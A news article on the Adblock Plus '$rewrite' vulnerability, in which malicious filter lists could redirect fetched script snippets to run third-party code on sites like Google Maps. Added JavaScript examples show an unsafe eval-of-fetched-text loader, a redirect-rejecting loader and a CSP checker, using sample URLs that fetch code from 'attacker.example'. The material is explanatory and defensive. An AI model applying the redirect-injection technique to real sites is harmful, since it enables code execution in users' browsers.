The Adblock Plus ad blocker allows third-party code to run

It was recently discovered that the popular ad blocker «Adblock Plus» has a vulnerability that allows the execution of JavaScript code on web pages to be arranged when unverified filters prepared by third parties with malicious intent are used (for example, by connecting a third-party rule set, or by substituting rules during a MITM attack).

Filter list authors can arrange for their own code to execute in the context of websites the user visits by means of rules that use the »$rewrite« operator, which allows part of a URL to be replaced.

How is this code execution possible?

The $rewrite option does not allow the host in the URL to be replaced, but it does allow the request's query arguments to be manipulated.

Nevertheless, code execution can still be achieved. Some sites, such as Google Maps, Gmail and Google Images, use the technique of dynamically loading blocks of executable JavaScript code that are transmitted as plain text.

If the server allows requests to be redirected, a request can be forwarded to another host by changing the URL parameters (for example, in Google's case, a redirect can be carried out through the »google.com/search« API).

In addition to hosts that allow redirects, services that let users host their own content (code hosting, text-pasting platforms and so on) can also be targeted.

The attack method presented only affects pages that dynamically load strings containing JavaScript code (for example, via XMLHttpRequest or Fetch) and then execute them.

Another major limitation is the need for a redirect, or for arbitrary data to be placed on the origin server that serves the resource.

Nevertheless, as a demonstration of the attack's relevance, it was shown how to arrange the execution of one's own code when opening maps.google.com, using a redirect through "google.com/search".

In fact, requests that use XMLHttpRequest or Fetch to download a remote script for execution do not fail when the $rewrite option is applied to them.

The redirect is also important because it lets XMLHttpRequest read the script from a remote site even though the request is addressed to the same origin.
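The loading pattern described above, as an added example that is not code from the article, from Adblock Plus or from any site named in it: a snippet loader that executes whatever text a fetch returns, beside a variant that refuses any response reached through a redirect or served from a different origin. The function names, the fake fetch and the sample URLs are constructed for the example.

```javascript
// Added example (not from the article, Adblock Plus, or any site it names):
// the "fetch text, then execute it" pattern beside a hardened loader.
// Function names and sample URLs are hypothetical; responses are constructed.

// Minimal stand-in for a Fetch API Response so the example runs offline.
// Response.url is the final URL after redirects; Response.redirected is true
// if any redirect was followed.
function makeResponse(finalUrl, redirected, body) {
  return { url: finalUrl, redirected, ok: true, text: async () => body };
}

// Constructed sample backend: the same endpoint, once as the page requests it
// and once with a rewritten query string that makes the server redirect.
const sampleResponses = {
  "https://maps.example/snippet?v=1":
    makeResponse("https://maps.example/snippet?v=1", false, "return 'legit snippet';"),
  "https://maps.example/snippet?v=1&next=https://attacker.example/payload.js":
    makeResponse("https://attacker.example/payload.js", true, "return 'hijacked';"),
};

async function fakeFetch(url) {
  if (!(url in sampleResponses)) throw new Error("not found: " + url);
  return sampleResponses[url];
}

// Executes downloaded text as code: the dangerous step in both loaders.
function runSnippet(code) {
  return new Function(code)();
}

// The pattern the article warns about: whatever comes back is executed,
// including a response obtained after an open redirect.
async function loadSnippetUnsafe(fetchImpl, url) {
  const res = await fetchImpl(url);
  return runSnippet(await res.text());
}

// Hardened decision: reject any response that was redirected, or whose final
// URL is not on the origin the page expects.
function isTrustedScriptResponse(res, expectedOrigin) {
  if (res.redirected) return false;
  let origin;
  try {
    origin = new URL(res.url).origin;
  } catch (e) {
    return false;
  }
  return origin === expectedOrigin;
}

async function loadSnippetChecked(fetchImpl, url, expectedOrigin) {
  const res = await fetchImpl(url);
  if (!isTrustedScriptResponse(res, expectedOrigin)) {
    throw new Error("refusing to execute code served from " + res.url);
  }
  return runSnippet(await res.text());
}

// Stand-alone demonstration of both loaders against the constructed backend.
async function demo() {
  const origin = "https://maps.example";
  const rewritten = "https://maps.example/snippet?v=1&next=https://attacker.example/payload.js";
  console.log("unsafe loader:", await loadSnippetUnsafe(fakeFetch, rewritten));
  console.log("checked loader, clean URL:",
    await loadSnippetChecked(fakeFetch, "https://maps.example/snippet?v=1", origin));
  try {
    await loadSnippetChecked(fakeFetch, rewritten, origin);
  } catch (e) {
    console.log("checked loader, rewritten URL:", e.message);
  }
}
demo();
```

In a real browser the same effect can be had without inspecting the response by requesting with `fetch(url, { redirect: "error" })`, which makes the fetch fail on any redirect; the check above additionally catches the case where the endpoint itself has been pointed at a foreign origin.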

Work on a fix is already under way

The fix is still in preparation. The problem also affects the AdBlock and uBlock blockers. The uBlock Origin blocker is not susceptible to the problem because it does not support the »$rewrite« operator.

At one point, the author of uBlock Origin refused to add $rewrite support, citing possible security issues and insufficient restriction at the host level (instead of rewrite, a querystrip option was proposed, which deletes query parameters rather than replacing them).

It is our responsibility to protect our users.

Despite the low real risk, we decided to remove the $rewrite option. Accordingly, we will release a new version of Adblock Plus as soon as it is technically possible.

We are doing this as a precaution. No attempt to abuse the rewrite option has been made, and we will do our best to prevent this from happening.

This means that there is no threat to any Adblock Plus user.

The Adblock Plus developers considered real attacks unlikely, since all changes to the regular rule lists are reviewed, and connecting third-party lists is something relatively few users do.

Rule substitution via MITM is ruled out by the default use of HTTPS for loading the regular block lists (for the remaining lists, it is planned to forbid downloading over HTTP in a future release).

To block such attacks on websites, the CSP (Content Security Policy) directive can be used, through which the hosts from which external resources may be loaded are explicitly defined.
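The CSP mitigation just mentioned, as an added example that is not code from the article or from Adblock Plus: a small evaluator for CSP source lists, used to show that a destination reached through a redirect is still checked against the policy, so a connect-src or script-src limited to known hosts blocks the payload even when the first request was same-origin. The function names are hypothetical and the policies, page origin and URLs are constructed samples; the matcher simplifies the specification (path matching is a prefix test and an omitted scheme accepts the page scheme or https).

```javascript
// Added example (not from the article or Adblock Plus): a simplified CSP
// source-list evaluator. Function names are hypothetical; policies and URLs
// are constructed samples.

function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1); // first occurrence wins, as in browsers
  }
  return directives;
}

function defaultPort(protocol) {
  return protocol === "https:" ? "443" : protocol === "http:" ? "80" : "";
}

// Matches one source expression: 'none', 'self', *, a scheme source such as
// https:, or a host source [scheme://]host[:port][/path] with a *. wildcard.
function matchesSource(expr, url, pageOrigin) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return url.origin === pageOrigin;
  if (e === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return url.protocol === e;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/.exec(e);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  if (scheme) {
    if (url.protocol !== scheme + ":") return false;
  } else if (url.protocol !== new URL(pageOrigin).protocol && url.protocol !== "https:") {
    return false; // simplified: omitted scheme accepts the page scheme or https
  }
  if (host.startsWith("*.")) {
    if (!url.hostname.endsWith(host.slice(1))) return false; // ".cdn.example" suffix; bare domain excluded
  } else if (url.hostname !== host) {
    return false;
  }
  if (port && port !== "*" && (url.port || defaultPort(url.protocol)) !== port) return false;
  if (path && !url.pathname.startsWith(path)) return false; // simplified path match
  return true;
}

// Looks up the governing directive (falling back to default-src, as browsers
// do for script-src and connect-src) and tests the URL against it.
function isAllowedByCsp(header, directive, resourceUrl, pageOrigin) {
  const csp = parseCsp(header);
  const list = csp[directive] || csp["default-src"];
  if (!list) return true; // no applicable directive: nothing is restricted
  const url = new URL(resourceUrl);
  return list.some((expr) => matchesSource(expr, url, pageOrigin));
}

// Every hop of a redirect chain is re-checked; one disallowed hop fails the load.
function isRedirectChainAllowed(header, directive, chain, pageOrigin) {
  return chain.every((u) => isAllowedByCsp(header, directive, u, pageOrigin));
}

// Constructed samples: a permissive policy beside a restrictive one, and the
// two-hop chain the article describes (same-origin request, redirect elsewhere).
const PAGE_ORIGIN = "https://maps.example";
const WEAK_CSP = "default-src *";
const STRICT_CSP = "default-src 'self'; script-src 'self'; connect-src 'self' https://apis.example.com";
const REDIRECT_CHAIN = [
  "https://maps.example/search?q=x&next=https://attacker.example/payload.js",
  "https://attacker.example/payload.js",
];

console.log("weak policy allows chain:",
  isRedirectChainAllowed(WEAK_CSP, "connect-src", REDIRECT_CHAIN, PAGE_ORIGIN));   // true
console.log("strict policy allows chain:",
  isRedirectChainAllowed(STRICT_CSP, "connect-src", REDIRECT_CHAIN, PAGE_ORIGIN)); // false
```

The design point is the per-hop check: the first URL in the chain is same-origin and passes `'self'`, but the redirect target is evaluated against the same directive and fails, which is why a host-restricted connect-src (and script-src, for code loaded via script elements) counters the redirect-based loading the article describes.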

Source: https://adblockplus.org, https://armin.dev
